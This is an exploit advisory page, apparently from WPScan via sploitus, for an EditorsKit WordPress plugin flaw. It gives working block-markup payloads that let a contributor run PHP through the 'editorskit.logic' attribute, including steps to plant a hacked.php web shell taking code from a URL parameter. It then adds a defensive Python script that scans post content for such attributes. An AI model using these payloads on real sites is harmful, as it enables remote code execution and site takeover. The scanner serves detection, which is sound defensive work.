## https://sploitus.com/exploit?id=WPEX-ID:BDC36F6A-682D-4D66-B587-92E86085D971
As a contributor, create or edit a post and paste the code below while in Code Editor mode:

<!-- wp:paragraph {"editorskit":{"logic":"file_put_contents('/var/www/hacked.txt', 'hacked')","devices":false,"desktop":true,"tablet":true,"mobile":true,"loggedin":true,"loggedout":true,"acf_visibility":"","acf_field":"","acf_condition":"","acf_value":"","migrated":false,"unit_test":false}} -->\n<p>aa</p>\n<!-- /wp:paragraph -->

Save or preview the page; this creates the /var/www/hacked.txt file.


(WPscanTeam) To create a shell:
- Payload: file_put_contents('/var/www/hacked.php', wp_unslash($_GET['c']))
- View/preview the post and add &c=<?php echo 'failed'; ?>, e.g.: https://example.com/?p=1079&preview=true&c=%3C?php%20echo%20%27Failed%27;%20?%3E
- Access https://example.com/hacked.php to execute the code
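
For site owners checking whether stored posts already carry this attribute, the following is an added example (not part of the original advisory or the plugin's code): it parses block delimiters in post content and reports every block whose `editorskit.logic` value is non-empty. It assumes the post bodies were exported from `wp_posts.post_content`; the function names and sample rows are constructed for illustration.

```python
import json
import re

# Opening (or self-closing) block delimiter: <!-- wp:name {json attrs} -->
BLOCK_OPEN = re.compile(r"<!--\s+wp:([a-z][a-z0-9_/-]*)\s+(\{.*?\})\s+/?-->", re.S)

def find_logic_blocks(post_content):
    """Return (block_name, logic) for each block with a non-empty editorskit.logic."""
    hits = []
    for match in BLOCK_OPEN.finditer(post_content):
        try:
            attrs = json.loads(match.group(2))
        except json.JSONDecodeError:
            continue  # not valid block attributes, nothing to inspect
        kit = attrs.get("editorskit")
        logic = kit.get("logic") if isinstance(kit, dict) else None
        if isinstance(logic, str) and logic.strip():
            hits.append((match.group(1), logic))
    return hits

def scan_posts(rows):
    """rows: iterable of (post_id, post_content); returns {post_id: hits} for flagged posts."""
    report = {}
    for post_id, content in rows:
        hits = find_logic_blocks(content)
        if hits:
            report[post_id] = hits
    return report

# Constructed sample rows; the first reuses the block markup shown above.
SAMPLE_FLAGGED = """<!-- wp:paragraph {"editorskit":{"logic":"file_put_contents('/var/www/hacked.txt', 'hacked')","desktop":true}} -->
<p>aa</p>
<!-- /wp:paragraph -->"""

SAMPLE_CLEAN = """<!-- wp:paragraph {"editorskit":{"logic":"","desktop":true}} -->
<p>ok</p>
<!-- /wp:paragraph -->
<!-- wp:paragraph -->
<p>no attributes</p>
<!-- /wp:paragraph -->"""

if __name__ == "__main__":
    for post_id, hits in scan_posts([(101, SAMPLE_FLAGGED), (102, SAMPLE_CLEAN)]).items():
        for block, logic in hits:
            print(f"post {post_id}: wp:{block} carries logic -> {logic!r}")
```

Any hit in a post authored by a low-privileged account deserves review, alongside a search of the web root for files that account should not have been able to create.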